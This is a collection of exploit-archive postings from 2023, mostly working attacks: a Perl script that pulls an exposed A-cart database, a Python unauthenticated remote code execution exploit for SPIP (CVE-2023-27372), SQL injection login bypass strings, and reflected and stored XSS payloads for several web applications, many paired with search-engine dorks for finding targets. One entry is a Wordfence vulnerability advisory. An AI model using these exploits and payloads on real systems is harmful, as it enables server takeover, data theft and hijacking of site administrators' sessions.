<pre><code>====================================================================================================================================<br />| # Title : A cart 2.0 Database Disclosure Exploit |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : http://ToastForums.com | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br />[-] Download the database: <br /><br /> The following Perl exploit will attempt to download the (acart.mdb ) file<br /> The (acart.mdb) It is the database and contains all the data .<br /> <br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] save code as perl file : poc.pl<br /><br />[+] code :<br /><br />#!/usr/bin/perl -w<br />#<br /># A_cart 2.0 Database Disclosure Exploit <br />#<br /># Author : indoushka<br />#<br /># Vondor : ToastForums.com<br /> <br /> <br /> <br />use LWP::Simple;<br />use LWP::UserAgent;<br /><br />system('cls');<br />system('A_cart 2.0 Database Disclosure Exploit');<br />system('color a');<br /><br /><br />if(@ARGV < 2)<br />{<br />print "[-]How To Use\n\n";<br />&help; exit();<br />}<br />sub help()<br />{<br />print "[+] usage1 : perl $0 site.com /path/ \n";<br />print "[+] usage2 : perl $0 localhost / \n";<br />}<br />($TargetIP, $path, $File,) = @ARGV;<br /><br />$File="acart2_0.mdb";<br />my $url = "http://" . $TargetIP . $path . $File;<br />print "\n Fuck you wait!!! \n\n";<br /><br />my $useragent = LWP::UserAgent->new();<br />my $request = $useragent->get($url,":content_file" => "D:/acart2_0.mdb");<br /><br />if ($request->is_success)<br />{<br />print "[+] $url Exploited!\n\n";<br />print "[+] Database saved to D:/acart2_0.mdb\n";<br />exit();<br />}<br />else<br />{<br />print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";<br />exit();<br />}<br /><br />Greetings to :==============================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br />============================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : 3CX Open Standards Software IP PBX Thailand v 2.0.3 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://3cx.com | <br />| # Dork : intext:''3CX: Open Standards Software IP PBX'' |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] use payload : /eventdetail.php?type_id=43&events_id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee><br /><br />[+] http://127.0.0.1/3cx/eventdetail.php?type_id=43&events_id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E<br /><br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
<pre><code>#!/usr/bin/env python3<br /># -*- coding: utf-8 -*-<br /><br /># Exploit Title: SPIP v4.2.1 - Remote Code Execution (Unauthenticated)<br /># Google Dork: inurl:"/spip.php?page=login"<br /># Date: 19/06/2023<br /># Exploit Author: nuts7 (https://github.com/nuts7/CVE-2023-27372)<br /># Vendor Homepage: https://www.spip.net/<br /># Software Link: https://files.spip.net/spip/archives/<br /># Version: < 4.2.1 (Except few fixed versions indicated in the description)<br /># Tested on: Ubuntu 20.04.3 LTS, SPIP 4.0.0<br /># CVE reference : CVE-2023-27372 (coiffeur)<br /># CVSS : 9.8 (Critical)<br />#<br /># Vulnerability Description:<br />#<br /># SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.<br /># This PoC exploits a PHP code injection in SPIP. The vulnerability exists in the `oubli` parameter and allows an unauthenticated user to execute arbitrary commands with web user privileges.<br />#<br /># Usage: python3 CVE-2023-27372.py http://example.com<br /><br />import argparse<br />import bs4<br />import html<br />import requests<br /><br />def parseArgs():<br /> parser = argparse.ArgumentParser(description="Poc of CVE-2023-27372 SPIP < 4.2.1 - Remote Code Execution by nuts7")<br /> parser.add_argument("-u", "--url", default=None, required=True, help="SPIP application base URL")<br /> parser.add_argument("-c", "--command", default=None, required=True, help="Command to execute")<br /> parser.add_argument("-v", "--verbose", default=False, action="store_true", help="Verbose mode. (default: False)")<br /> return parser.parse_args()<br /><br />def get_anticsrf(url):<br /> r = requests.get('%s/spip.php?page=spip_pass' % url, timeout=10)<br /> soup = bs4.BeautifulSoup(r.text, 'html.parser')<br /> csrf_input = soup.find('input', {'name': 'formulaire_action_args'})<br /> if csrf_input:<br /> csrf_value = csrf_input['value']<br /> if options.verbose:<br /> print("[+] Anti-CSRF token found : %s" % csrf_value)<br /> return csrf_value<br /> else:<br /> print("[-] Unable to find Anti-CSRF token")<br /> return -1<br /><br />def send_payload(url, payload):<br /> data = {<br /> "page": "spip_pass",<br /> "formulaire_action": "oubli",<br /> "formulaire_action_args": csrf,<br /> "oubli": payload<br /> }<br /> r = requests.post('%s/spip.php?page=spip_pass' % url, data=data)<br /> if options.verbose:<br /> print("[+] Execute this payload : %s" % payload)<br /> return 0<br /><br />if __name__ == '__main__':<br /> options = parseArgs()<br /><br /> requests.packages.urllib3.disable_warnings()<br /> requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'<br /> try:<br /> requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'<br /> except AttributeError:<br /> pass<br /><br /> csrf = get_anticsrf(url=options.url)<br /> send_payload(url=options.url, payload="s:%s:\"<?php system('%s'); ?>\";" % (20 + len(options.command), options.command))<br /> <br /><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.netartmedia.net/talroo-jobs │<br />│ Vendor : NetArt Media │<br />│ Software : Talroo Jobs Script 1.0 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /index.php<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://www.website/index.php?page=jobs&category=1&lrw3e"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"k1n44=1<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>On May 22, 2023, our Wordfence Threat Intelligence team identified and began the responsible disclosure process for an Authentication Bypass vulnerability in StylemixThemes’s BookIt plugin, which is actively installed on more than 10,000 WordPress websites. The vulnerability makes it possible for an attacker to gain access to any account on the site, including the administrator account, if the attacker knows their email address.<br /><br />Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on May 22, 2023. Sites still using the free version of Wordfence will receive the same protection on June 21, 2023.<br /><br />We contacted StylemixThemes on May 22, 2023, and received a response the next day. After providing full disclosure details, the developer released the first patch on May 31, 2023, which still contained a vulnerability and then released the fully patch on June 13, 2023. We would like to commend the StylemixThemes development team for their prompt response and timely patch.<br /><br />We urge users to update their sites with the latest patched version of BookIt, version 2.3.8 at the time of this writing, as soon as possible.<br /><br />READ THIS POST ON THE BLOG<br /><br />Vulnerability Summary from Wordfence Intelligence<br /><br />Description: BookIt <= 2.3.7 – Authentication Bypass <br /><br />Affected Plugin: Booking Calendar | Appointment Booking | BookIt<br /><br />Plugin Slug: bookit<br /><br />Affected Versions: <= 2.3.7<br /><br />CVE ID: CVE-2023-2834<br /><br />CVSS Score: 9.8 (Critical)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/<br /><br />Researcher/s: Lana Codes <br /><br />Fully Patched Version: 2.3.8<br /><br />The BookIt plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.3.7. This is due to insufficient verification on the user being supplied during booking an appointment through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.<br /><br />Technical Analysis<br /><br />The BookIt plugin provides the shortcode ‘[bookit]‘ to embed an appointment booking calendar into a page on a WordPress site. By using this functionality, after selecting the date and time in the calendar, it is possible to book an appointment by providing the name, email address, and password for registration.<br /><br />Examining the code reveals that the plugin checks for the user id based on the email address supplied via the ‘email’ parameter. If the email belongs to an existing WordPress user, it will associate the request to that user and set the authentication cookies for that user.<br /><br />[View this code snippet on the blog] <br /><br />Unfortunately, this functionality was insecurely implemented as it does not include any authentication checks such as password verification. It is simply looking for an identity and authorizing that claim without proper verification and authentication.<br /><br />This makes it possible for threat actors to bypass authentication and gain access to arbitrary accounts on sites running a vulnerable version of the plugin. As always, this makes it easy for threat actors to completely compromise a vulnerable WordPress site and further infect the victim.<br /><br />Disclosure Timeline<br /><br />May 22, 2023 – Discovery of the Authentication Bypass vulnerability in BookIt.<br /><br />May 22, 2023 – We initiate contact with the plugin vendor asking that they confirm the inbox for handling the discussion.<br /><br />May 22, 2023 – Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability.<br /><br />May 23, 2023 – The vendor confirms the inbox for handling the discussion.<br /><br />May 23, 2023 – We send over the full disclosure details. The vendor acknowledges the report and begins working on a fix.<br /><br />June 13, 2023 – A fully patched version of the plugin, 2.3.8, is released.<br /><br />July 21, 2023 – Wordfence Free users receive the same protection.<br /><br />Conclusion<br /><br />In this blog post, we have detailed an Authentication Bypass vulnerability within the BookIt plugin affecting versions 2.3.7 and earlier. This vulnerability allows threat actors to bypass authentication and gain access to accounts of users, if the attacker knows the email address. The vulnerability has been fully addressed in version 2.3.8 of the plugin.<br /><br />We encourage WordPress users to verify that their sites are updated to the latest patched version of BookIt as soon as possible.<br /><br />Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on May 22, 2023. Sites still using the free version of Wordfence will receive the same protection on June 21, 2023.<br /><br />If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.<br /><br />For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.<br /><br /></code></pre>
<pre><code>Exploit Title: Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)<br />Google Dork: N/A<br />Date: 18-06-2023<br />Exploit Author: Harshit Joshi<br />Vendor Homepage: https://community.broadcom.com/home<br />Software Link: https://www.broadcom.com/products/identity/siteminder<br />Version: 12.52<br />Tested on: Linux, Windows<br />CVE: CVE-2023-23956<br />Security Advisory: https://support.broadcom.com/external/content/SecurityAdvisories/0/22221<br /><br />*Description:*<br />I am writing to report two XSS vulnerabilities (CVE-2023-23956) that I have<br />discovered in the Symantec SiteMinder WebAgent. The vulnerability is<br />related to the improper handling of user input and has been assigned the<br />Common Weakness Enumeration (CWE) code CWE-79. The CVSSv3 score for this<br />vulnerability is 5.4.<br /><br />Vulnerability Details:<br />---------------------<br />*Impact:*<br /><br />This vulnerability allows an attacker to execute arbitrary JavaScript code<br />in the context of the affected application.<br /><br />*Steps to Reproduce:*<br /><br />*First:*<br /><br />1) Visit -<br />https://domain.com/siteminderagent/forms/login.fcc?TYPE=xyz&REALMOID=123&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22<br /><br />2) After visiting the above URL, click on the "*Change Password*" button,<br />and the popup will appear.<br />- The *SMAGENTNAME *parameter is the source of this vulnerability.<br />*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*<br /><br />*Second:*<br /><br />1) Visit -<br />https://domain.com/siteminderagent/forms/login.fcc?TYPE=123&TARGET=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22<br />2) After visiting the above URL, click on the "*Change Password*" button,<br />and the popup will appear.<br />- The *TARGET *parameter is the source of this vulnerability.<br />*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*<br /><br /><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.netartmedia.net/php-hotel-booking │<br />│ Vendor : NetArt Media │<br />│ Software : PHP Hotel Site 2.0 │<br />│ Vuln Type: Stored XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Allow Attacker to inject malicious code into website, give ability to steal sensitive │<br />│ information, manipulate data, and launch additional attacks. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />## Stored XSS<br /><br />-----------------------------------------------<br />POST /booking/index.php HTTP/2<br /><br />page=book&id=0&room_code=F753N132&room_name=Standard+double+room&price=&start_time=1687237200&end_time=1687410000&nights=&ProceedBooking=1&name=[XSS Payload]&email=abc%40abc.com&phone=[XSS Payload]&code=28649&remarks=[XSS Payload]<br />-----------------------------------------------<br /><br />POST parameter 'name' is vulnerable to XSS<br />POST parameter 'phone' is vulnerable to XSS<br />POST parameter 'remarks' is vulnerable to XSS<br /><br /><br />## Steps to Reproduce:<br /><br />1. At the index page Search for your Booking (as Guest)<br />2. Select any Room by Press [Book Now]<br />3. Inject your [XSS Payload] in "Name"<br />4. Inject your [XSS Payload] in "Phone"<br />5. Inject your [XSS Payload] in "Remarks "<br />6. Press [Book Now] to Submit You will receive to (Thank you. You'll receive an email when your booking is confirmed.)<br /><br />6. When the Admin Login to the Administration Panel on this Path (https://website/booking/admin/index.php)<br />7. XSS will Fire & Executed on his Browser Instantly After the Login<br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password<br /># Dork: inurl:/wp-includes/class-wp-query.php<br /># Date: 2023-06-19<br /># Exploit Author: Amirhossein Bahramizadeh<br /># Category : Webapps<br /># Vendor Homepage: https://www.templatemonster.com/wordpress-themes/medic-health-and-medical-clinic-wordpress-theme-216233.html<br /># Version: 1.0.0 (REQUIRED)<br /># Tested on: Windows/Linux<br /># CVE: CVE-2020-11027<br /><br />import requests<br />from bs4 import BeautifulSoup<br />from datetime import datetime, timedelta<br /><br /># Set the WordPress site URL and the user email address<br />site_url = 'https://example.com'<br />user_email = 'user@example.com'<br /><br /># Get the password reset link from the user email<br /># You can use any email client or library to retrieve the email<br /># In this example, we are assuming that the email is stored in a file named 'password_reset_email.html'<br />with open('password_reset_email.html', 'r') as f:<br /> email = f.read()<br /> soup = BeautifulSoup(email, 'html.parser')<br /> reset_link = soup.find('a', href=True)['href']<br /> print(f'Reset Link: {reset_link}')<br /><br /># Check if the password reset link expires upon changing the user password<br />response = requests.get(reset_link)<br />if response.status_code == 200:<br /> # Get the expiration date from the reset link HTML<br /> soup = BeautifulSoup(response.text, 'html.parser')<br /> expiration_date_str = soup.find('p', string=lambda s: 'Password reset link will expire on' in s).text.split('on ')[1]<br /> expiration_date = datetime.strptime(expiration_date_str, '%B %d, %Y %I:%M %p')<br /> print(f'Expiration Date: {expiration_date}')<br /><br /> # Check if the expiration date is less than 24 hours from now<br /> if expiration_date < datetime.now() + timedelta(hours=24):<br /> print('Password reset link expires upon changing the user password.')<br /> else:<br /> print('Password reset link does not expire upon changing the user password.')<br />else:<br /> print(f'Error fetching reset link: {response.status_code} {response.text}')<br /> exit()<br /> <br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WordPress - Kero jQuery/HTML Dashboard PRO Auth BY pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.2(64-bit) | <br />| # Vendor : https://dashboardpack.com/theme-details/kero-jquery-html-dashboard-pro/ | <br />| # Dork : |<br />====================================================================================================================================<br /><br />P0C :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : /panel/sign-in.php<br /><br />[+] User & Pass : ' or 0=0 #<br /><br />[+] https://127.0.0.1/spdmuniversal.in/panel/sign-in.php<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.netartmedia.net/blog-lite │<br />│ Vendor : NetArt Media │<br />│ Software : Blog LITE 2.1 │<br />│ Vuln Type: Stored XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Allow Attacker to inject malicious code into website, give ability to steal sensitive │<br />│ information, manipulate data, and launch additional attacks. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />## Stored XSS<br /><br />---------------------------------------------------------<br />POST /blog/index.php HTTP/2<br /><br /><br />-----------------------------401019026540470155022776857270<br />Content-Disposition: form-data; name="title"<br /><br />[XSS Payload]<br />-----------------------------401019026540470155022776857270<br />Content-Disposition: form-data; name="content"<br /><br /><br />-----------------------------401019026540470155022776857270<br />Content-Disposition: form-data; name="author"<br /><br />[XSS Payload]<br />-----------------------------401019026540470155022776857270<br />Content-Disposition: form-data; name="email"<br /><br /><br />-----------------------------401019026540470155022776857270<br /><br /><br />## Steps to Reproduce:<br /><br />1. Visit Any Category on the Blog<br />2. Write a comment (as Guest)<br />3. Inject your [XSS Payload] in "Comment Title"<br />4. Inject your [XSS Payload] in "Your Name"<br />5. Submit<br /><br />6. By default the Blog Disable your comment for Admin Check<br />7. Admin Check the [BLOG POSTS] in the Administration Panel on this Path (https://website/blog/admin/index.php?page=posts)<br />8. When the Admin check the comments on this Path (https://website/blog/admin/index.php?page=comments&id=2)<br />9. XSS Will Fire and Executed on his Browser<br /><br />[-] Done<br /></code></pre>